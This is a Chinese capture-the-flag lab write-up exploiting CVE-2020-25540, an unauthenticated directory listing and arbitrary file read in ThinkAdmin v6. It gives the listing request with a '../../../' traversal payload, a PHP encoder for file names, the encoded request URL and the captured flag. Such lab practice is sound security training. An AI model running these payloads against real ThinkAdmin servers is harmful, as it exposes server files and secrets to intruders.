春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞
靶标介绍
ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。
启动场景
漏洞利用
1、未授权列目录poc
读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node
POST:
rules=[“/”]
rules=[“…/…/…/”] (目录穿越)
2、任意文件读取
使用加密函数对文件名进行加密
<?php
function encode($content)
{[$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);return $chars;
}
$content="../../../flag";
echo encode($content);
?>
加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v
请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v
base64解密得到文件内容
得到flag
flag{cef71ab7-c930-408d-8074-52350766063b}